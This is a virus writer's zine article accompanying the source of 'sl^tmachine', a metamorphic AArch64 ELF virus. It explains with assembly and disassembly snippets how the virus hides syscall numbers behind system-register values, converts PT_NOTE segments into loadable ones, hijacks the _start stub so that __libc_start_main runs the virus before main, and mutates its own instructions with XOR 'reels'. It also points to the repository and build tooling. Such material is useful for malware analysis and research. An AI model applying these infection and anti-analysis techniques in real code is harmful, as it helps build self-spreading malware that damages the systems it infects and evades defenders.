┌───────────────────────┐ ▄▄▄▄▄ ▄▄▄▄▄ ▄▄▄▄▄ │ │ █ █ █ █ █ █ │ │ █ █ █ █ █▀▀▀▀ │ │ █ █ █ █ ▄ │ │ ▄▄▄▄▄ │ │ █ █ │ │ █ █ │ │ █▄▄▄█ │ │ ▄ ▄ │ │ █ █ │ │ █ █ │ │ █▄▄▄█ │ │ ▄▄▄▄▄ │ │ █ │ sl^tmachine: metamorphic AARCH64 ELF virus │ █ │ ~ vrzh └───────────────────█ ──┘ sl^tmachine is a metamorphic AARCH64 ELF virus that implements a PT_NOTE to PT_LOAD infection method and a few obfuscation techniques. This txt acts as a supplement to the virus source code and the blind analysis from qkumba. ╓ ╖ ═╣ Abusing system registers ╠═════════════════════════════════════════════════ ╙ ╜ While working on this virus, I wanted to find a way to obfuscate immediate values. I ended up coming up with an interesting technique, which on its own isn't difficult to defeat, but could potentially present some annoying issues to the analyst. System registers often contain reserved set bits and predictable values. They can be used as a seed at runtime to compute an arbitrary value that would otherwise appear as an immediate. Starting with ARMv7, CTR_EL0 - the cache type register - will always have the bit 31 reserved as set [0]. This bit provides us with a power of 2 from a register that was never touched by our code. This can be useful for obfuscating values, for instance when the parasite allocates space on the stack. Makes tracking stack variables pretty annoying. ┌─┤ Obfuscating sub sp, sp, 0x80 ├────────────────────────────────────────────┐ │ 400078: d53b0020 mrs x0, ctr_el0 │ │ 40007c: 92610000 and x0, x0, #0x80000000 │ │ 400080: aa4063e0 orr x0, xzr, x0, lsr #24 │ │ 400084: cb2063ff sub sp, sp, x0 │ └─────────────────────────────────────────────────────────────────────────────┘ While that's fun, the technique really comes in handy when we try to obfuscate syscall numbers: ┌─┤ Obfuscating openat(3) call ├──────────────────────────────────────────────┐ │ 400088: 92800c60 mov x0, #0xffffffffffffff9c │ │ 40008c: 10000941 adr x1, 4001b4 <path> │ │ 400090: d2800042 mov x2, #0x2 │ │ 400094: d53b0028 mrs x8, ctr_el0 │ │ 400098: 92610108 and x8, x8, #0x80000000 │ │ 40009c: aa4867e8 orr x8, xzr, x8, lsr #25 │ │ 4000a0: d1002108 sub x8, x8, #0x8 │ │ 4000a4: d4000001 svc #0x0 │ └─────────────────────────────────────────────────────────────────────────────┘ Simple, but makes reversing tedious. Note that this technique isn't limited to CTR_EL0 - it will work with any available system register with a RES1 (always set) bit, or another predictable value. Similarly, to obfuscate a null value you could grab a RES0, for instance shifting value in CTR_EL0 by 32 bits. To keep things varied, you could switch the math around, shifting right by 31 bits instead of a bitwise and with 0x80000000. If you're using a system register value to profile the host and determine whether you want your virus to run, you could use this technique not only for obfuscation, but to calculate potentially different syscall numbers if the host matches or does not match the expected value. As far as I know, no reverse engineering platform uses reserved system register values in constant propagation. Indeed, when loading the virus into binja the decompilation looks a bit rough. While you can probably already think of some ways to defeat this technique, I think it can still be effective against automated static analysis, and together with anti-emulation present issues to less naive automatic analysis systems. ╓ ╖ ═╣ A note on PT_NOTE -> PT_LOAD ╠══════════════════════════════════════════════ ╙ ╜ A quick note on writing a PT_NOTE to PT_LOAD infector. The spec [1] says: "executables and shared objects must have loadable program segments whose file offsets and virtual addresses are congruent modulo the page size." So when we're converting the PT_NOTE segment into a PT_LOAD segment we must make sure that p_offset % PAGE_SIZE == p_vaddr % PAGE_SIZE. I chose to set p_offset of the newly minted PT_LOAD segment to a page-aligned file offset. Since many AARCH64 systems have 0x10000 pages, a reliable method to calculate our infection offset is to add 0x10000 to the ELF's total size, followed by a page alignment: ┌─┤ slotmachine.s ├───────────────────────────────────────────────────────────┐ │ ldr x4, [sp, 80] // original st_size │ │ add x4, x4, 0x10000 │ │ and x4, x4, 0xffffffffffff0000 │ │ str x4, [x1, p_offset] │ └─────────────────────────────────────────────────────────────────────────────┘ The p_vaddr will also be set to a page-aligned address. The tradeoff for the simplicity and reliability is that this method isn't space-efficient. ╓ ╖ ═╣ Hijacking execution ╠═══════════════════════════════════════════════════════ ╙ ╜ RISC architectures don't get the luxury of a single op far call, so accessing virtual memory many pages away leaves a predictable pattern. In AARCH64, such a pattern is an adrp instruction followed by either an ldr or add. One can run into it hijacking the PLT and other GOT accesses (note that position dependent code is out of scope). In the _start stub, this pattern serves as a convenient anchor to hijack code flow. Let's take a look at an example: ┌─┤ glibc ├─────────────────────────────────────┤ sysdeps/aarch64/start.S ├───┐ │ │ │ ENTRY(_start) │ │ /* Create an initial frame with 0 LR and FP */ │ │ cfi_undefined (x30) │ │ mov x29, #0 │ │ mov x30, #0 │ │ │ │ /* Setup rtld_fini in argument register */ │ │ mov x5, x0 │ │ │ │ /* Load argc and a pointer to argv */ │ │ ldr PTR_REG (1), [sp, #0] │ │ add x2, sp, #PTR_SIZE │ │ │ │ /* Setup stack limit in argument register */ │ │ mov x6, sp │ │ │ │ #ifdef PIC │ │ # ifdef SHARED │ │ adrp x0, :got:main │ │ ldr PTR_REG (0), [x0, #:got_lo12:main] │ │ # else │ │ adrp x0, __wrap_main │ │ add x0, x0, :lo12:__wrap_main │ │ # endif │ │ #else │ │ /* Set up the other arguments in registers */ │ │ MOVL (0, main) │ │ #endif │ │ mov x3, #0 /* Used to be init. */ │ │ mov x4, #0 /* Used to be fini. */ │ │ │ │ /* __libc_start_main (main, argc, argv, init, fini, rtld_fini, │ │ stack_end) */ │ │ │ │ /* Let the libc call main and exit with its return code. */ │ │ bl __libc_start_main │ │ │ │ /* should never get here....*/ │ │ bl abort │ └─────────────────────────────────────────────────────────────────────────────┘ If the target binary is ET_DYN the address of main will be served via GOT, so the adrp instruction will be followed by an ldr to dereference the pointer into GOT. In ET_EXEC binaries it's followed by an add to compute the address of the wrap_main function. What if instead of the address of main, __libc_start_main received the entry point of our virus? All we have to do is: 1) Disassemble the adrp and the following adjusting instruction to calculate the branch target for the virus exit. 2) Modify the adrp instruction to instead load the new PT_LOAD segment's page offset. 3) If the virus entry point is at the top of the page, replace the following instruction with a nop, else patch in an adjusting instruction. ┌─┤ Host's entry point before infection ├─────────────────────────────────────┐ │ 00000000000006c0 <_start>: │ │ 6c0: d503245f bti c │ │ 6c4: d280001d mov x29, #0x0 │ │ 6c8: d280001e mov x30, #0x0 │ │ 6cc: aa0003e5 mov x5, x0 │ │ 6d0: f94003e1 ldr x1, [sp] │ │ 6d4: 910023e2 add x2, sp, #0x8 │ │ 6d8: 910003e6 mov x6, sp │ │ 6dc: f00000e0 adrp x0, 1f000 <__FRAME_END__+0x1e6d4> │ │ 6e0: f947ec00 ldr x0, [x0, #4056] │ │ 6e4: d2800003 mov x3, #0x0 │ │ 6e8: d2800004 mov x4, #0x0 │ │ 6ec: 97ffffe1 bl 670 <__libc_start_main@plt> │ │ 6f0: 97ffffec bl 6a0 <abort@plt> │ └─────────────────────────────────────────────────────────────────────────────┘ ┌─┤ Host's entry point after infection ├──────────────────────────────────────┐ │ ... │ │ 6dc: 90000180 adrp x0, 30000 <__bss_end__+0xffc0> │ │ 6e0: d503201f nop │ │ 6e4: d2800003 mov x3, #0x0 // #0 │ │ 6e8: d2800004 mov x4, #0x0 // #0 │ │ 6ec: 97ffffe1 bl 670 <__libc_start_main@plt> │ └─────────────────────────────────────────────────────────────────────────────┘ If you weren't lazy like me and decided to append your code flush with the host's end of file, replace the nop with an adjusting instruction. Don't forget, the file offset must be congruent to the new PT_LOAD segment's virtual address modulo the page size. A downside of this method is that some reverse engineering frameworks won't just rely on symbols (binja ftw) making a smart deduction that the first argument to __libc_start_main might just be the main function. If there is already a main symbol, it will label the virus as main_<function address>, otherwise it will lump it together with the real main function. This is likely because we simply branch to main after the virus finished executing. ╓ ╖ ═╣ Metamorphic Engine ╠════════════════════════════════════════════════════════ ╙ ╜ Mechanical slot machines are fascinating devices. They operate three or more rotating reels, that display symbols to the player. Just like the mechanical slot machine, the lookup table of sl^tmachine's metamorphic engine consists of a series of rotating "reels" that display symbols. Each symbol describes how an instruction or instructions will transform at the next morph point, and the reel rotates each time the virus infects a new host. Although I wrote the virus in assembly, I find it easier to represent a reel in C: ┌─┤ Representation of a reel in C ├───────────────────────────────────────────┐ │ struct reel { │ │ uint16_t instruction_index; │ │ uint8_t reel_max_index:4; │ │ uint8_t reel_index:4; │ │ uint8_t symbol_length; │ │ uint32_t symbols[]; │ │ }; │ └─────────────────────────────────────────────────────────────────────────────┘ The instruction_index is an index of the first instruction in a series of contiguous instructions. In the virus generated for this issue, it is often a single instruction. The reel_max_index is the index of the last symbol in the reel and the reel_index is the current position of the reel. The symbol_length corresponds to a number of contiguous instructions that shall be modified at morph point by this reel. For instance, if we're swapping two neighboring instructions, symbol_length would be 2. So what are those symbols? It's pretty simple - a symbol is a value that when xored with a current instruction will transform it into the following instruction. So if a reel consists of three symbols, the rotation would look like this: ┌─┤ Rotating 3-symbol reel ├──────────────────────────────────────────────────┐ │ instruction0 ⊕ symbol0 = instruction1 │ │ instruction1 ⊕ symbol1 = instruction2 │ │ instruction2 ⊕ symbol2 = instruction0 │ └─────────────────────────────────────────────────────────────────────────────┘ Optionally, a reel may include one or several zero symbols that will not transform the instruction. This allows reels containing the same number of transformations to rotate at different speeds, resulting in more outcomes. A nice alternative would have been to grab a pseudorandom number and use its bits to determine whether a reel should rotate, but unfortunately I was running out of time to complete the virus, so I left it as an exercise to the reader. ╓ ╖ ═╣ Using sl^tmachine repo ╠════════════════════════════════════════════════════ ╙ ╜ Building and testing metamorphic code can be challenging. The sl^tmachine repo can be used as a starting point if you want to mess around with sl^tmachine code [2]. ╭ ╮ ───┤ Building sl^tmachine ├──────────────────────────────────────────────────── ╰ ╯ Just run make, duh. Seriously, the virus source consists of three parts. The slotmachine_meat.s and slotmachine_tail.s are the head and tail of the virus source respectively. In the middle goes a lookup table generated by the morph table builder. The morph_table_builder is basically a harness around capstone and keystone libraries written in C which will disassemble the plain virus and generate the morph table. There is no domain specific language (DSL) - I just used janky C logic to figure out whether a given instruction should have an entry in the lookup table. With some effort it's possible to implement a more sophisticated set of rules. The makefile will build the plain virus, build and run morph_table_builder, put the generated virus source together, and build the generated virus. ╭ ╮ ───┤ Testing sl^tmachine ├───────────────────────────────────────────────────── ╰ ╯ To test whether multiple generations of the virus will not break the host, I made a super basic test environment, which runs the virus against a fresh host, then replaces the virus with the infected host, and copies over a fresh host once again in an infinite loop. It can be found in the evolution_chamber directory. More info on running tests can be found in the repo's readme. ╓ ╖ ═╣ Greetz ╠═════════════════════════════════════════════════════════════════════ ╙ ╜ Huge thanks to qkumba for agreeing to analyze my virus and sblip for coming up with the idea for this collaboration! Special thanks to deluks for lending his discerning eye. Greetz to tmp.out, vxug, and rootSYN. ╓ ╖ ═╣ References ╠════════════════════════════════════════════════════════════════ ╙ ╜ [0] Arm Architecture Reference: A-profile architecture (D23.2.37) [1] System V ABI for the Arm® 64-bit Architecture (AArch64) 2024Q3 [2] https://github.com/v-rzh/Linux.Slotmachine --[ First gen source code ]--[ Linux.Slotmachine.s ]-- --[ PREV | HOME | NEXT ]--